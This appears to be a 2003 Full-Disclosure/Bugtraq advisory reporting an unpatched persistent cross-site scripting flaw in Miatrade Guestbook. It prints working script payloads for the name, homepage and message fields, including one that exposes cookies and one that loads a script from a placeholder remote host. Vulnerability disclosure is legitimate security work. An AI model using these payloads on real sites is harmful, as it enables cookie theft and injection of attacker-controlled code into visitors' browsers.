[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE14aEfU61Y2F0002c64a@hotmail.com>
Date: Sun, 24 Aug 2003 15:12:15 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
Subject: Miatrade Guestbook - Persistant XSS
------------------------------------------------------------------
- EXPL-A-2003-021 exploitlabs.com Advisory 021
------------------------------------------------------------------
-= Miatrade Guestbook =-
Aug 20, 2003
Donnie Werner
morning_wood@...loitlabs.com
Product:
--------
Miatrade guestbook
http://www.miatrade.com
http://www.google.com/keyword/Miatrade+Guestbook
Vunerability:
----------------
1. persistant XSS
Description of product:
-----------------------
"Miatrade Guestbook gives you the ability to gather information
from your visitors. They can post a public message that
may include: Name, E-mail, url, Home page and Comments
about your site.
Miatrade guestbook let's you keep in touch with who's visiting
your site and are a great way to make your site more
interactive and keep visitors coming back."
VUNERABILITY / EXPLOIT
======================
Miatrade guestbook does not filter HTML code from user-supplied
input. A remote user can create a specially crafted URL that,
when loaded by a target user, will cause arbitrary scripting
code to be executed by the target user's browser. The code will
originate from the site running the Miatrade guestbook software
and will run in the security context of that site.
persistant XSS rendered in fields:
[name] - <script>alert("You are vunerable to xss")</script>
[homepage] - <script>document.write(document.cookie)</script>
[message] - <script language="JavaScript"
src="http://someremote-url/nasty.js" type="text/javascript"></script>
live examples:
demo - sign
http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi
demo - view
http://www.miatrade.com/cgi-bin/guest/view.pl?fibi
Local:
------
no
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
Concurrent with this advisory
info@...trade.com
Credits:
--------
Donnie Werner
co-founder / CTO
e2-labs.com
morning_wood@...labs.com
http://exploitlabs.com
http;//nothackers.org/about.php
Original advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists